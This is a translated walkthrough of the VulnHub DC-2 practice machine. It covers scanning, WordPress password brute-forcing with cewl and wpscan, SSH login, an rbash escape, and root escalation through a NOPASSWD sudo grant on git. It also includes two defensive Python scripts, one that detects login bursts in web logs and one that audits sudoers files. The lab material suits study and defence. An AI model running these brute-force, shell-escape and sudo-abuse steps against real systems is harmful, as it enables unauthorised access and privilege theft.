Target-Machine Penetration Practice 70: DC2

一葉_code 2022-04-21 Reads: 42
Web security

Target description

Target URL: http://www.vulnhub.com/entry/dc-2,311/

1. Setting up the lab environment

Attacker machine: Kali

Target machine

Note: the target and Kali only need to be on the same LAN (same subnet, i.e. both VMs use the same network mode).

The lab environment is set up as shown (screenshot not reproduced).

2. Hands-on

2.1 Network scanning

2.1.1 Start the target and Kali, then scan

Method 1: arp-scan -I eth0 -l (scan on a specified interface)

arp-scan -I eth0 -l

⬢  DC2  arp-scan -I eth0 -l 
Interface: eth0, type: EN10MB, MAC: 00:50:56:27:27:36, IPv4: 192.168.9.7
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.2     08:00:27:c6:db:e9       PCS Systemtechnik GmbH
192.168.9.68    08:00:27:e8:e7:b0       PCS Systemtechnik GmbH

2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.914 seconds (133.75 hosts/sec). 2 responded
Method 2: masscan <subnet> -p <ports>

masscan 192.168.184.0/24 -p 80,22

Method 3: netdiscover -i <interface> -r <subnet>

netdiscover -i eth0 -r 192.168.184.0/24

Method 4: left for readers to add

2.1.2 Check the target's open ports

Use nmap -A -sV -T4 -p- <target ip> to list the target's open ports:

⬢  DC2  nmap -A -sV -T4 -p- 192.168.9.68   
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-08 16:21 CST
Nmap scan report for bogon (192.168.9.68)
Host is up (0.00039s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Did not follow redirect to http://dc-2/
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 08:00:27:E8:E7:B0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.39 ms bogon (192.168.9.68)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.24 seconds

The following ports are open:

80—http—Apache httpd 2.4.10 ((Debian))

7744—ssh—OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)

2.2 Enumerating vulnerabilities

2.2.1 Port 80 analysis

The description says the hosts file needs to be modified, so add this to /etc/hosts:

192.168.9.68 dc-2

Visit: http://dc-2/

Opening the page shows the site is built on WordPress (WP), and there is a Flag entry in the menu; opening it reveals flag1.

(screenshot of flag1 and its translation not reproduced)

The hint tells us to build a wordlist with cewl.

Run: cewl http://dc-2 -w 2.txt

Since we already know this is a WordPress site, we can use wpscan to brute-force the login.

wpscan needs to be updated before first use.

If it throws errors, run apt-get update && apt-get upgrade,

then reinstall with gem install wpscan and run wpscan --update; in practice the reinstall already gives you the latest version.

Next, continue the brute force with the tool:

wpscan --url http://dc-2 -P 2.txt

The brute force yields a username and password.

Run a directory scan:
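From the defender's side, the wpscan password attack described above leaves an obvious trace in the web server log: a burst of POST requests to /wp-login.php from a single client. The Python script below is an added example, not part of the original post; the Apache log lines in it are constructed, and the 200-vs-302 rule for failed/successful logins is WordPress's default behaviour.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" format; only the fields this check needs are captured.
LOG_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample log: 192.168.9.7 hammers the login form (the attacker box
# in this lab), 192.168.9.50 is an ordinary visitor who logs in once.
SAMPLE_LOG = """\
192.168.9.7 - - [08/Apr/2022:16:35:01 +0800] "POST /wp-login.php HTTP/1.1" 200 2356
192.168.9.7 - - [08/Apr/2022:16:35:01 +0800] "POST /wp-login.php HTTP/1.1" 200 2356
192.168.9.7 - - [08/Apr/2022:16:35:02 +0800] "POST /wp-login.php HTTP/1.1" 200 2356
192.168.9.7 - - [08/Apr/2022:16:35:02 +0800] "POST /wp-login.php HTTP/1.1" 200 2356
192.168.9.7 - - [08/Apr/2022:16:35:03 +0800] "POST /wp-login.php HTTP/1.1" 200 2356
192.168.9.7 - - [08/Apr/2022:16:35:03 +0800] "POST /wp-login.php HTTP/1.1" 302 0
192.168.9.50 - - [08/Apr/2022:16:35:10 +0800] "GET /index.php HTTP/1.1" 200 4821
192.168.9.50 - - [08/Apr/2022:16:36:40 +0800] "POST /wp-login.php HTTP/1.1" 302 0
"""


def find_login_bursts(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: (login_posts, successes)} for every client that POSTed to
    /wp-login.php at least `threshold` times within any `window`.
    WordPress answers a failed login with 200 (form re-rendered) and a
    successful one with a 302 redirect, so the two are told apart by status."""
    posts, success = defaultdict(list), defaultdict(int)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if m["path"].split("?")[0] != "/wp-login.php":
            continue
        posts[m["ip"]].append(datetime.strptime(m["ts"], TS_FMT))
        if m["status"] == "302":
            success[m["ip"]] += 1
    hits = {}
    for ip, times in posts.items():
        times.sort()
        for i, start in enumerate(times):  # sliding window over sorted times
            if sum(1 for t in times[i:] if t - start <= window) >= threshold:
                hits[ip] = (len(times), success[ip])
                break
    return hits


if __name__ == "__main__":
    for ip, (n, ok) in find_login_bursts(SAMPLE_LOG).items():
        print(f"{ip}: {n} login POSTs, {ok} succeeded -> possible password guessing")
```

A burst that ends in a 302 is the case worth alerting on first: the guessing stopped because a password worked.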

⬢  DC2  dirsearch -u http://dc-2               

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/dc-2/_22-04-08_16-36-05.txt

Error Log: /root/.dirsearch/logs/errors-22-04-08_16-36-05.log

Target: http://dc-2/

[16:36:05] Starting: 
[16:36:06] 403 -  290B  - /.ht_wsr.txt
[16:36:06] 403 -  293B  - /.htaccess.bak1
[16:36:06] 403 -  295B  - /.htaccess.sample
[16:36:06] 403 -  293B  - /.htaccess.save
[16:36:06] 403 -  293B  - /.htaccess.orig
[16:36:06] 403 -  291B  - /.htaccess_sc
[16:36:06] 403 -  294B  - /.htaccess_extra
[16:36:06] 403 -  291B  - /.htaccessOLD
[16:36:06] 403 -  291B  - /.htaccessBAK
[16:36:06] 403 -  293B  - /.htaccess_orig
[16:36:06] 403 -  292B  - /.htaccessOLD2
[16:36:06] 403 -  283B  - /.htm
[16:36:06] 403 -  284B  - /.html
[16:36:06] 403 -  293B  - /.htpasswd_test
[16:36:06] 403 -  290B  - /.httr-oauth
[16:36:06] 403 -  289B  - /.htpasswds
[16:36:07] 403 -  283B  - /.php
[16:36:07] 403 -  284B  - /.php3
[16:36:20] 301 -    0B  - /index.php  ->  http://dc-2/
[16:36:22] 200 -   19KB - /license.txt
[16:36:27] 200 -    7KB - /readme.html
[16:36:28] 403 -  292B  - /server-status
[16:36:28] 403 -  293B  - /server-status/
[16:36:32] 301 -  299B  - /wp-admin  ->  http://dc-2/wp-admin/
[16:36:32] 301 -  301B  - /wp-content  ->  http://dc-2/wp-content/
[16:36:32] 200 -    0B  - /wp-content/
[16:36:32] 200 -    0B  - /wp-config.php
[16:36:32] 200 -   69B  - /wp-content/plugins/akismet/akismet.php
[16:36:32] 500 -    0B  - /wp-content/plugins/hello.php
[16:36:32] 301 -  302B  - /wp-includes  ->  http://dc-2/wp-includes/
[16:36:32] 500 -    0B  - /wp-includes/rss-functions.php
[16:36:32] 200 -    0B  - /wp-cron.php
[16:36:32] 302 -    0B  - /wp-signup.php  ->  http://dc-2/wp-login.php?action=register
[16:36:32] 200 -    2KB - /wp-login.php
[16:36:33] 302 -    0B  - /wp-admin/  ->  http://dc-2/wp-login.php?redirect_to=http%3A%2F%2Fdc-2%2Fwp-admin%2F&reauth=1
[16:36:33] 200 -    1B  - /wp-admin/admin-ajax.php
[16:36:33] 405 -   42B  - /xmlrpc.php
[16:36:33] 200 -   40KB - /wp-includes/
[16:36:33] 500 -    4KB - /wp-admin/setup-config.php
[16:36:33] 200 -    1KB - /wp-admin/install.php

Task Completed

Open wp-login.php to reach the login page and sign in with the credentials just obtained.

Visit: http://dc-2/wp-login.php

(screenshots of the login page and of the next hint, with its translation, not reproduced)

2.2.2 Port 7744 analysis

Back to the scanned ports: besides 80 there is 7744, and the service on it is OpenSSH.

Following the earlier hint, we try SSH with the WordPress account credentials.

Testing shows jerry cannot log in over SSH, but tom can.

ssh tom@dc-2 -p 7744

⬢  DC2  ssh tom@dc-2 -p 7744
tom@dc-2's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$ 

ls shows flag3.txt, but cat and more appear to be blocked: the shell is a restricted bash (rbash).

tom@DC-2:~$ ls
flag3.txt  usr
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
tom@DC-2:~$ more flag3.txt
-rbash: more: command not found
tom@DC-2:~$ 
tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ export PATH=$PATH:/bin
$ export PATH=$PATH:/usr/bin
$ ls
flag3.txt  usr
$ cat flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
$ 

The translation is a bit odd, but the gist is that we should switch to jerry with su.

Good thing we fixed PATH earlier, otherwise su probably would not have worked either.

After switching user, we go to jerry's home directory and find flag4.

jerry@DC-2:/home/tom$ cd ..
jerry@DC-2:/home$ ls
jerry  tom
jerry@DC-2:/home$ cd jerry
jerry@DC-2:~$ ls
flag4.txt
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

jerry@DC-2:~$ 

2.3 Exploitation

.....

2.4 Privilege escalation

2.4.1 Information gathering

Look for SUID binaries: find / -perm -u=s -type f 2>/dev/null

jerry@DC-2:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/at
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/bin/umount
/bin/mount
/bin/su
jerry@DC-2:~$ 

Check sudo -l:

jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
jerry@DC-2:~$ 

We find that git can be run as root without a password (and notice that flag4 ends with "git").

Search https://gtfobins.github.io for git privilege escalation:

1. sudo git help config  # at the pager's last-line command prompt, enter
!/bin/bash or !'sh'  # to complete the escalation
2. sudo git -p help
!/bin/bash  # entering !/bin/bash opens a shell running as root
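The root cause here is the sudoers entry (root) NOPASSWD: /usr/bin/git: git opens a pager for help, and the pager lets jerry shell out as root. The script below is an added example, not from the original post. It audits constructed sudoers-style lines (the jerry line copies the sudo -l output above; the other users and the SPAWNS_CHILDREN list are assumptions) and flags NOPASSWD grants, ALL command lists, and child-spawning commands that lack sudo's NOEXEC tag.

```python
import re

# Constructed sudoers-style lines for this example. The jerry entry mirrors
# what `sudo -l` reported on DC-2; the other users are made up for contrast.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults env_reset, mail_badpass
jerry  ALL=(root) NOPASSWD: /usr/bin/git
tom    ALL=(root) NOEXEC: /usr/bin/git
ops    ALL=(ALL) NOPASSWD: ALL
backup ALL=(root) /usr/bin/rsync
"""

# Commands that hand control to a child (git opens a pager for `help`), so a
# sudo grant on them is effectively a grant on whatever that child runs.
# Assumed allow-list for this example; extend it from your own review.
SPAWNS_CHILDREN = {"/usr/bin/git"}

# user host=(runas) [TAG: ...] command[, command]   (aliases/#include not handled)
SPEC_RE = re.compile(r'^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*\((?P<runas>[^)]*)\)\s*'
                     r'(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$')


def audit_sudoers(text):
    """Return (user, finding) pairs for user specifications that let the
    grantee reach a root shell without a password check or via a child process."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] == "#" or line.startswith("Defaults"):
            continue
        m = SPEC_RE.match(line)
        if not m:
            continue
        user = m["user"]
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        cmds = [c.strip() for c in m["cmds"].split(",")]
        if "ALL" in cmds:
            findings.append((user, "unrestricted command list (ALL)"))
        if "NOPASSWD" in tags:
            findings.append((user, "NOPASSWD removes the password check"))
        for cmd in cmds:
            if cmd in SPAWNS_CHILDREN and "NOEXEC" not in tags:
                # sudo's NOEXEC tag blocks exec() from dynamically linked programs,
                # which stops git from launching its pager (and thus a shell).
                findings.append((user, f"{cmd} can spawn a pager/shell; add NOEXEC"))
    return findings


if __name__ == "__main__":
    for user, finding in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{user}: {finding}")
```

NOEXEC only constrains dynamically linked programs, and the parser ignores aliases and #include directives, so treat this as a first pass over a real sudoers file rather than a complete review.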

After escalating, we get final-flag.txt:

root@DC-2:/home/jerry# cd /root
root@DC-2:~# ls
final-flag.txt
root@DC-2:~# cat final-flag.txt
 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

root@DC-2:~# 

Summary

On this box we built a wordlist with cewl and brute-forced the WordPress login, logged in to get a hint, then logged in over SSH and gathered information, switched user after the next hint, and finally escalated to root via git.

  1. Information gathering
  2. Building a wordlist with cewl
  3. Using wpscan
  4. Directory scanning
  5. Escaping -rbash to /bin/sh
  6. sudo privilege escalation via git